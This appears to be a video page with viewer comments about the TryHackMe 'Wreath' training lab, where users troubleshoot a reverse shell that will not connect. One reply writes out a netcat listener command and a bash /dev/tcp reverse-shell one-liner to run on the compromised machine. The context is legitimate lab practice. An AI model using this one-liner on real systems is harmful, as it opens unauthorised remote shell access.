Follow me on Twitter: / darkstar7471 Join my community discord server: / discord TryHackMe Official Discord: / discord TryHackMe Official Subreddit: / tryhackme TryHackMe Room: tryhackme.com/room/wreath
Any reason why the reverse shell doesn't work with the in browser kali/attack box? I was originally going through this room using a kali vm but switched to the browser box because the vmware machine wouldn't let me install pip. But now that I'm in the browser it although it lets me install pip it won't let me get a reverse shell so it's like I've just traded one problem for another...
The netcat listener wont do a thing, no matter what port I choose.... Ive tried at least 20 times. The IP is correct (the one TryHackMe gave me for the wreath network). What can I try to make it go through? Thank you in advance for any help I can get
Hello, I have tried to do the following, once you have run the exploit and you have the PTY, in your own terminal, run this: nc -lnvp 1234 This will start a net cat listener, the port you choose is not really important... Then on the PTY run this: bash -c "bash -i >& /dev/tcp//1234 0>&1" NOTE you must change the tun0 IP with your own IP, it is the one that starts by 10.50 This worked for me, the other option would be typing the word shell in the PTY and following the steps, hope it helps...